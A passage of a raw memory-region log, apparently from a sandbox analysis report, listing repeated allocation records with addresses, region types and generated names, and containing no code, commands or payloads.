pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7742 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7743 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7744 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7745 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7746 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7747 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7748 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7749 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7751 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7752 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7753 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7757 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7758 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7759 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7760 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7761 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7762 start_va = 0x400000 end_va = 0x402fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7763 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7764 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7765 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7766 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7767 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7768 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7769 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7770 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7771 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7772 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7773 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7774 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7775 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7776 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7777 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7778 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7779 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7780 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7781 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7782 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7783 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7784 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7786 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7787 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7788 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7789 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7790 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7791 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7792 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7793 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7794 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7795 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7796 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7797 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7798 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7799 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7800 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7801 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7802 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7803 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7804 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7805 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7806 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7807 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7808 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7809 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7810 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7811 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7812 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7813 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7814 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7815 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7816 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7817 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7818 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7819 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7820 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7821 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7822 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7823 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7824 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7825 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7826 start_va = 0x7c60000 end_va = 0x7d59fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c60000" filename = "" Region: id = 7827 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7828 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7829 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7830 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7831 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7832 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7833 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7834 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7835 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7836 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7837 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7838 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7839 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7840 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7841 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7842 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7843 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7844 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7845 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7846 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7847 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7848 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7849 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7850 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7851 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7852 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7853 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 7854 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7855 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7856 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7857 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7858 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7859 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7860 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7861 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7862 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7863 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7864 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7865 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7866 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7867 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7868 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7869 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7870 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7871 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7872 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7873 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7874 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7875 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7876 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7877 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7878 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7879 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7880 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7881 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7882 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7883 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7884 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7885 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7886 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7887 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7888 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7889 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7890 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7891 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7892 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7893 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7894 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7895 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7896 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7897 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7898 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7900 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7901 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7902 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7903 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7904 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7905 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7906 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7907 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7908 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7909 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7910 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7911 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7912 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7913 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 7914 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7915 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7916 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7917 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7918 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7919 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7920 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7921 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7922 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7923 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7924 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7925 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7926 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7927 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7928 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7929 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7930 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7931 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7932 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7933 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7934 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7935 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7936 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7937 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7938 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7939 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7940 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7941 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7942 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7943 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 7944 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7945 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7946 start_va = 0x400000 end_va = 0x40ffff 